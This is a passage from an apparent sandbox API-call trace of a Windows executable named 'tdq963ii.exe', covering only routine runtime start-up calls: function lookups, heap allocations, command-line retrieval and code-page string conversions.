GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0218.885] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0218.885] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0218.885] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0218.885] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0218.885] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0218.886] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0218.886] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0218.886] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0218.886] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0218.886] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0218.886] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0218.887] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0218.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x3a82f0c0, dwHighDateTime=0x1d68287)) [0218.895] GetCurrentThreadId () returned 0xa8c [0218.895] GetCurrentProcessId () returned 0x490 [0218.895] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=33923380868) returned 1 [0218.902] GetProcessHeap () returned 0x2b0000 [0219.288] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0219.288] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0219.289] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0219.289] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0219.289] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0219.289] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0219.289] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0219.290] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0219.290] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0219.290] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0219.290] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0219.290] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0219.290] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0219.291] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0219.291] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0219.291] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0219.291] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0219.291] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0219.291] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0219.292] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0219.292] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0219.292] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0219.292] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0219.292] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0219.292] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0219.292] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0219.293] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0219.293] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0219.293] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0219.293] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0219.293] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0219.293] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0219.293] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0219.294] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0219.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3bc) returned 0x2c70a0 [0219.779] GetCurrentThreadId () returned 0xa8c [0219.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2c7468 [0219.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2c7488 [0219.780] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xdea9ca64, hStdError=0x0)) [0219.780] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0219.780] GetFileType (hFile=0x3) returned 0x2 [0219.780] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.780] GetFileType (hFile=0x7) returned 0x2 [0219.781] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0219.781] GetFileType (hFile=0xb) returned 0x2 [0219.781] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0219.781] GetEnvironmentStringsW () returned 0x2c7c90* [0219.782] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb86) returned 0x2c8820 [0219.785] FreeEnvironmentStringsW (penv=0x2c7c90) returned 1 [0219.786] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0219.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x2c7c90 [0219.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xa0) returned 0x2c7d30 [0219.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3e) returned 0x2c4dd0 [0219.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c7dd8 [0219.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6e) returned 0x2c7e50 [0219.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x78) returned 0x2bf900 [0219.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x62) returned 0x2c7ec8 [0219.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c7f38 [0219.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x48) returned 0x2c7f70 [0219.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2a) returned 0x2c7fc0 [0219.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x28) returned 0x2c7ff8 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1a) returned 0x2c6a70 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4a) returned 0x2c8028 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x72) returned 0x2bf980 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x30) returned 0x2c8080 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c80b8 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1c) returned 0x2c6a98 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xd2) returned 0x2c80f0 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x7c) returned 0x2c81d0 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x36) returned 0x2c8258 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3a) returned 0x2c4e18 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x90) returned 0x2c8298 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2c8330 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x30) returned 0x2c8360 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x36) returned 0x2c8398 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x48) returned 0x2c83d8 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x52) returned 0x2c8428 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3c) returned 0x2c4e60 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2c8488 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x82) returned 0x2c84a8 [0219.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c8538 [0219.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1e) returned 0x2c6ac0 [0219.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2c) returned 0x2c8570 [0219.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x54) returned 0x2c85a8 [0219.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x52) returned 0x2c8608 [0219.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2a) returned 0x2c8668 [0219.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3c) returned 0x2c4ea8 [0219.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x54) returned 0x2c86a0 [0219.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2c8700 [0219.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x30) returned 0x2c8730 [0219.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8c) returned 0x2c8768 [0219.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8820 | out: hHeap=0x2b0000) returned 1 [0220.258] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2c8800 [0220.258] GetLastError () returned 0x0 [0220.258] SetLastError (dwErrCode=0x0) [0220.258] GetLastError () returned 0x0 [0220.259] SetLastError (dwErrCode=0x0) [0220.259] GetLastError () returned 0x0 [0220.259] SetLastError (dwErrCode=0x0) [0220.259] GetACP () returned 0x4e4 [0220.260] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x220) returned 0x2c9008 [0220.260] GetLastError () returned 0x0 [0220.260] SetLastError (dwErrCode=0x0) [0220.260] IsValidCodePage (CodePage=0x4e4) returned 1 [0220.260] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0220.260] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0220.263] GetLastError () returned 0x0 [0220.263] SetLastError (dwErrCode=0x0) [0220.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0220.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0220.267] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0220.267] GetLastError () returned 0x0 [0220.267] SetLastError (dwErrCode=0x0) [0220.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0220.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0220.267] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0220.267] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0220.267] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿôË©Þäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0220.267] GetLastError () returned 0x0 [0220.267] SetLastError (dwErrCode=0x0) [0220.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0220.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0220.267] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0220.267] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0220.267] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 